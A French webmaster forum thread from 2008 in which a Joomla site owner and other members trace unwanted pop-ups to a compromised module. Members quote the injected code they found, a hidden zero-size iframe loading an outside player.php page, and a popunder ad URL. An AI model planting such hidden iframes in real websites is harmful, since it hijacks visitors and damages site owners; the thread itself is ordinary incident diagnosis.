Serveur Hacké ?

Consultez la formation à Google Analytics de WebRankInfo / Ranking Metrics


thecashcow
WRInaute discret
WRInaute discret
 
Messages: 65
Inscription: 11 Juin 2007

Serveur Hacké ?

Message le Jeu Aoû 21, 2008 9:22

Bonjour tout le monde,

Je vous écrit aujourd'hui car j'ai besoin d'avoir des avis extérieur sur ce qu'il m'arrive depuis une semaine déjà. (J'ai cherché avant de poster)

Sur mon site (buzzmoica.Fr), des pop-ups s'ouvrent à tout va sur n'importe quelle de mes pages alors que bien sûr, je n'ai jamais installé de script pour de telles pubs.

La monétisation du site est uniquement avec Adsense qui vous le savez, n'autorise pas ces publicités intempestives.

Le site est hébergé sur un dédié OVH. Je leur ai écrit et j'attends toujours leur réponse.

Les pubs sont apparemment générées par une plateforme qui s'appelle Blue Advetiser.

Est ce que cela dit quelque chose à quelqu'un ? Avez vous déjà eu ce genre de problème ?

Merci d'avance pour vos réponses ! :lol:


hebmaster
WRInaute passionné
WRInaute passionné
 
Messages: 1133
Inscription: 22 Déc 2005

Message le Jeu Aoû 21, 2008 9:34

<hs>la balise "<style>" est autorisé dans le body? j'ai jamais vu un site le faire sauf sur le tien.</hs>


thecashcow
WRInaute discret
WRInaute discret
 
Messages: 65
Inscription: 11 Juin 2007

oui

Message le Jeu Aoû 21, 2008 9:37

Oui, elle est autorisée, cela peut poser problème ?


nickargall
WRInaute accro
WRInaute accro
 
Messages: 6339
Inscription: 13 Juin 2005

Message le Jeu Aoû 21, 2008 9:50

(hs) oui on peut le faire, mais c'est pas tres clean(/hs)

En ce qui concerne les popup : ca peut etre un bout de javascript que tu as inséré sur ton site (un truc de compteur gratuit, un script d'annuaire ..) qui génère ces affichages ? Mais j'ai pas vu grand chose dans ton code (survolé rapidement) qui puisse générer ça (a part ptet un script javascript "ltassrv" mais placé en commentaires html, donc ..


thecashcow
WRInaute discret
WRInaute discret
 
Messages: 65
Inscription: 11 Juin 2007

oui

Message le Jeu Aoû 21, 2008 10:17

Merci pour les réponses :)

J'ai pensé à ça au début, un bout de script perdu, mais rien. Et en plus, ya pas vraiment de raison qu'il y en ai.
Concernant les widgets qui pourraient contenir une pub, pareil, rien à signaler, je n'en ai pas installé.

C'est quand même incroyable dene pas savoir d'où ca vient non ? :) :) :)

Je me demande si OVH n'est pas derrière tout ca.

Pourquoi je pense ça ? Parce que les popups ont commencé à apparaitre le 14 Aout, le jour où il y a eu un problème sur le serveur et qu'une équipe est intervenue sur le serveur. ils ont tout géré tout seul en 24 heures. J'étais en vacances, je ne me suis apperçu de rien. j'ai juste découvert les emails de maintenance...

De plus, ayant installé un disque USB supplémentaire sur le seveur il y a 2 mois, ce même problème était survenu. Il a disparu après que j'ai formaté le lecteur usb et fait son installation.

Ca me parrait logique pour considérer qu'il y a quelque chose avec ovh. Mais je ne comprends pas pourquoi ni comment !
(J'attends toujours la réponse de leur hotline)

:?


Bool
WRInaute passionné
WRInaute passionné
 
Messages: 1290
Inscription: 26 Fév 2004

Message le Jeu Aoû 21, 2008 10:25

Oh c'est clair que c'est vachement intéressant de la part d'OVH d'aller installer des popups sur les sites de certains clients dédiés...

Tu as un Joomla, et les failles de sécurité y sont fréquentes. Je chercherais d'abord de ce coté à ta place.


thecashcow
WRInaute discret
WRInaute discret
 
Messages: 65
Inscription: 11 Juin 2007

Message le Jeu Aoû 21, 2008 10:29

Oui tu as raison, ca parrait absurde.
Je vais continuer sur la sécu alors...
Au hasard, Y aurait il un site qui puisse scanner en live et détecter les failles ?
Merci ! :) :)

Spoiler
WRInaute discret
WRInaute discret
 
Messages: 53
Inscription: 26 Oct 2007

Message le Jeu Aoû 21, 2008 10:33

Bonjour,
Regarde dans ton code, si tu n'as pas un appel vers cette page :
http://www.diydaily.info/player/player.php

C'est elle qui semble générer tes pop-ups. Cherche en ligne de commande, sinon download ton site, et fais une recherche dans le répertoire à l'aide de l'éditeur Notepad++

Bon Courage !


thecashcow
WRInaute discret
WRInaute discret
 
Messages: 65
Inscription: 11 Juin 2007

ok

Message le Jeu Aoû 21, 2008 10:36

Je vais voir ca tout de suite, merci :)


guicara
WRInaute passionné
WRInaute passionné
 
Messages: 2462
Inscription: 2 Fév 2006

Message le Jeu Aoû 21, 2008 11:14

Moi je vois ça au chargement de ton index :

Image

Voulu ?


thecashcow
WRInaute discret
WRInaute discret
 
Messages: 65
Inscription: 11 Juin 2007

non

Message le Jeu Aoû 21, 2008 11:43

Non, pas voulu du tout !
grrr, je cherche je cherche, merci à toi Guicara :)


bproductiv
WRInaute accro
WRInaute accro
 
Messages: 4146
Inscription: 27 Déc 2004

Message le Jeu Aoû 21, 2008 11:47

-http://creditburner.blueadvertise.com/popunder.php?uid=ZGFuaWVsMDEwMDE=

a tout hasard ??


bproductiv
WRInaute accro
WRInaute accro
 
Messages: 4146
Inscription: 27 Déc 2004

Message le Jeu Aoû 21, 2008 11:48

trouvé avec firebug > script

vaxrei
Nouveau WRInaute
Nouveau WRInaute
 
Messages: 41
Inscription: 13 Nov 2007

Message le Jeu Aoû 21, 2008 11:55

regarde de ce coté :

Code: Tout sélectionner
<iframe frameborder="0"height="0"width="0"
src="http://www.diydaily.info/player/player.php"></iframe>


thecashcow
WRInaute discret
WRInaute discret
 
Messages: 65
Inscription: 11 Juin 2007

re

Message le Jeu Aoû 21, 2008 12:45

Re Bonjour,

Alors, grâce à vos réponses, je pense être sur la piste.
Comme vous l'avez noté, le site est développé sous Joomla.

Je pense pour l'instant que c'est le module lié au composant Mosets Tree qui a été infiltré.
Sur la page d'accueil, le module se nomme : "Vos Buzz à la Une" et il y a un module similaire dans la section news : "Vos Buzz au hasard"
Ce Script (Iframe) n'est présent que lorsque le module est présent.
Mais je ne suis pas sûr parce que le système de popups ne se déclenche pas toujours, cad que je peux actualiser la page sur laquelle la pub apparaissait sans pour autant qu'elle ne ressorte une deuxième fois...

Ca avance :)

Serveur Hacké ?

Si vous avez aimé cette discussion, partagez-la sur vos réseaux sociaux préférés :

Formation recommandée sur ce thème :

Formation Google Analytics : en 2 jours, apprenez comment exploiter l'essentiel des possibilités de l'outil de mesure d'audience de Google. Formation animée par les experts Google Analytics de Ranking Metrics.

Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.

Lectures recommandées sur ce thème :



Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités